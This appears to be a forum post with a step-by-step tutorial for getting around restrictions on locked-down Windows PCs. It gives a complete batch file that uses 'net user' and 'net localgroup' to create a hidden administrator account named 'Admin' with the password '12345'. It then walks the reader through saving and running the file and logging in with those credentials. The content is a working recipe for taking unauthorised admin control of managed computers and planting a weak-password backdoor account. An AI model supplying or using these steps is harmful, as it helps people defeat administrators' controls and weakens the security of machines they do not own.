Well ill be asleep in 6 hours. So Just do this.
Here is a tutorial!
Creating a Batch File.
Step one.
Open notepad.exe and copy and paste this into a blank notepad.
@echo off
net user Admin 12345 /add
goto admin
:admin
net localgroup administrators Admin /add
pause
Step two.
Click in the upper left hand side of the window and select file. Then click "save as"
name the file "cmd.bat". then slect below the name file type to all files. and save as cmd.bat.
Save the file to your desktop.
Open the file saved to your desktop!
Note-- if it says cmd.bat.txt you did not select "all files" in file type.
Now the above instructions just allowed you to make a cmd prompt since Blocked pc's have disabled it.
Now if this batch file Returns
System error 5 has occurred.
Access is denied.
Contact me! If this happens. We Will try to do it another way.
If it says It was completed successfully
log out and type "Admin" as username and "12345" for the password.